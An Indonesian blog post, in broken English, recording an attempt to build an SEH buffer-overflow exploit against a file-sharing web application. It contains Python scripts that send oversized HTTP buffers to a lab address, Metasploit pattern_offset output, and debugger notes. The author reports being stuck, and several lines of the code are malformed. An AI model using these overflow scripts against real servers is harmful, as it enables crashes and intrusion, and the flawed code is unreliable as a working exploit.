Rabu, 22 Februari 2012

SEH FILE SHERING WIZARD

initial stage is to prepare the application is file sharing,,,,
and then prepare a fuzzer,,,



#!/usr/bin/python
import socket
target_address="192.168.56.24"
target_port=80  
#buffer = "USV "
#buffer+="\x90" * 962
buffer="http://"
buffer+="\x41" * 121000 + "\r\n\r\n"
#
buffer+="\x90" * 120025
buffer+"\xcc\xcc\xcc\xcc"
buffer+="\x41\x41\x41\x41"
buffer+="\x90" * (121004-len(buffer)) 
#buffer+="\r\n
#buffer+="\xcc\xcc\xcc\xcc"
#uffer+="\x41\x41\x41\x41"
#buffer+="\x90" * (150000 - len(buffer))
#buffer+="\x6A\x19\x9A\x0F" # al
#buffer+="\x90" * (3000 - len(buffer))
buffer+="\r\n\r\n"  
sock=socket.socket (socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()  




then see the results of cress which occurs in the application view using ollidbgr,,




then see the results via VIEW-> SEH shif and press F9,,




above shows the value of EIP is 4141414,,


then follow the next dump
with a right click event on the stack the line,,,




hen dump the results of the follow,,,


then later to see results




then subsequently conducted patten_creat...





root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 30785839 121000
18629
38909
59189
79469
99749
120029
root@bt:/pentest/exploits/framework/tools#


then later to see results,,,,








from here I started having problems, among others, 414 141 did not appear but that appears to be 909 090,,,,
then I tried to change the cress into 121 000 cresnya not going to be tetapai 41414142121212,,






#!/usr/bin/python
import socket
target_address="192.168.56.24"
target_port=80
#buffer = "USV "
#buffer+="\x90" * 962
buffer="http://"
#buffer+="\x41" * 121000 + "\r\n\r\n"
buffer+="\x90" * 120025
buffer+"\xcc\xcc\xcc\xcc"
buffer+="\x41\x41\x41\x41"
buffer+="\x90" * (121004-len(buffer))
#buffer+="\r\n
#buffer+="\xcc\xcc\xcc\xcc"
#uffer+="\x41\x41\x41\x41"
#buffer+="\x90" * (150000 - len(buffer))
#buffer+="\x6A\x19\x9A\x0F" # al
#buffer+="\x90" * (3000 - len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket (socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()


then i tried pyton the result to be 909 090 instead of 41,414,141,,






root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 30785839
root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 30785839 121000
18629
38909
59189
79469
99749
120029
root@bt:/pentest/exploits/framework/tools#

patten_offset addresses of all the results remain,, 909090instead of 4141414 problems it happens,,,





!/usr/bin/python
import socket
target_address="192.168.56.24"
target_port=80
#buffer = "USV "
#buffer+="\x90" * 962
buffer="http://"
#buffer+="\x41" * 121000 + "\r\n\r\n"
buffer+="\x90" * 120025
buffer+"\xcc\xcc\xcc\xcc"
buffer+="\x41\x41\x41\x41"
buffer+="\x90" * (121004-len(buffer))
#buffer+="\r\n
#buffer+="\xcc\xcc\xcc\xcc"
#uffer+="\x41\x41\x41\x41"
#buffer+="\x90" * (150000 - len(buffer))
#buffer+="\x6A\x19\x9A\x0F" # al
#buffer+="\x90" * (3000 - len(buffer))

hings that happen and problem not want to change 90 "to 909090 to 4141414 but,,,,,
Diposting oleh di 10.00

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)